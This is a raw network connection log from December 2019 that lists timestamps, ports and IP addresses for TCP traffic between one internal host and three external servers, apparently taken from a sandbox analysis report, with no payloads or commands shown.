Dec 9, 2019 17:30:40.920428991 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.920589924 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:31:40.876897097 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:31:40.876923084 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:31:40.877155066 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:31:54.046124935 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:31:56.378719091 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.379406929 CET	49229	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.404021025 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.404139042 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.404555082 CET	80	49229	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.404638052 CET	49229	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.405203104 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.431222916 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454516888 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454540968 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454554081 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454566956 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454581976 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454597950 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454612970 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454627991 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.454663038 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.454900026 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.455190897 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.455236912 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.455261946 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.457000017 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.480644941 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480758905 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.480791092 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480812073 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480828047 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480844021 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480854034 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.480861902 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480879068 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480895042 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480953932 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.480978012 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.480998993 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481012106 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481028080 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481043100 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481056929 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.481061935 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481080055 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481096029 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481113911 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481129885 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.481168985 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.482904911 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.482949972 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.482974052 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.484801054 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.504803896 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504820108 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504831076 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504843950 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504849911 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.504968882 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504980087 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.504988909 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505022049 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505031109 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505084038 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505095005 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505141020 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505151033 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505156994 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505230904 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505256891 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505269051 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505300045 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505319118 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505330086 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505358934 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505377054 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505388021 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505417109 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505492926 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505506039 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505515099 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505542040 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505552053 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505563021 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505572081 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505580902 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505613089 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505613089 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505624056 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505728006 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505732059 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505786896 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505798101 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505808115 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.505810022 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.505943060 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.508313894 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.508382082 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.508403063 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.508470058 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.515655041 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537013054 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537079096 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537126064 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537128925 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537164927 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537200928 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537235975 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537239075 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537271023 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537300110 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537334919 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537349939 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537369013 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537405014 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537430048 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537439108 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537473917 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537497997 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537508011 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537554979 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537579060 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537590981 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537626028 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537652969 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537659883 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537694931 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537719965 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537729979 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537765980 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537802935 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537817955 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537836075 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537870884 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537899017 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.537905931 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537944078 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.537997007 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538027048 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538039923 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538075924 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538110971 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538145065 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538161039 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538177967 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538213015 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538239002 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538248062 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538281918 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538304090 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538316965 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538352013 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538388968 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538398027 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538424015 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538459063 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538482904 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538492918 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538527966 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538551092 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538562059 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538597107 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538631916 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538638115 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538665056 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538700104 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538724899 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538733959 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538769007 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538793087 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538804054 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538837910 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538862944 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538872957 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538907051 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538943052 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.538943052 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.538981915 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.539004087 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.542576075 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.560471058 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560497046 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560513973 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560532093 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560548067 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560563087 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560579062 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.560602903 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.560692072 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.586920023 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.610654116 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610778093 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.610810995 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610825062 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610835075 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610846996 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610858917 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610867977 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.610871077 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610882998 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610894918 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610905886 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610923052 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610944033 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.610948086 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.610997915 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611011028 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611021042 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611032009 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611042023 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611053944 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611064911 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611071110 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611076117 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611088037 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611099005 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611110926 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611121893 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611134052 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611145020 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611155987 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611166954 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611167908 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611179113 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611190081 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611201048 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611212015 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611223936 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611234903 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611241102 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611246109 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611257076 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611268997 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611279964 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611290932 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611301899 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611306906 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611314058 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611325026 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611335993 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611346960 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611358881 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611370087 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611381054 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611381054 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611392021 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611402988 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611413956 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611443043 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611460924 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611469984 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.611478090 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611495972 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.611560106 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.622505903 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.633657932 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.633686066 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.633701086 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.633716106 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.633728027 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.633820057 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.634249926 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.634270906 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.634284973 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.634361982 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.800844908 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.822243929 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.822289944 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.822309017 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.822325945 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.822335005 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:56.822341919 CET	80	49228	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:56.822695971 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:57.484934092 CET	49228	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:57.485065937 CET	49229	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.612881899 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.614058971 CET	49231	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.636850119 CET	80	49230	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.636933088 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.637691021 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.637842894 CET	80	49231	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.637907028 CET	49231	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.661077023 CET	80	49230	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.684199095 CET	80	49230	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.684349060 CET	80	49230	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.684372902 CET	80	49230	89.249.65.189	192.168.2.2
Dec 9, 2019 17:31:58.684427977 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:58.684916973 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:59.927303076 CET	49230	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:31:59.927429914 CET	49231	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:11.260103941 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.261533022 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.285389900 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.285535097 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.286775112 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.286911011 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.324599981 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.325853109 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.349905014 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.351128101 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.365675926 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.365708113 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.365719080 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.365859032 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.366858006 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.366880894 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.366893053 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.367013931 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.392915964 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.415015936 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.418337107 CET	443	49232	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.418493032 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:11.441067934 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:11.441216946 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:24.727597952 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:24.756575108 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:24.793508053 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:24.793605089 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:24.793689966 CET	443	49233	216.58.201.101	192.168.2.2
Dec 9, 2019 17:32:24.794125080 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:30.500005007 CET	49232	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:30.500344992 CET	49233	443	192.168.2.2	216.58.201.101
Dec 9, 2019 17:32:54.285482883 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.285826921 CET	49237	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.309489012 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.309623003 CET	80	49237	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.309645891 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.310023069 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.310115099 CET	49237	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.334266901 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353746891 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353773117 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353784084 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353795052 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353806019 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353909969 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353930950 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353943110 CET	80	49236	89.249.65.189	192.168.2.2
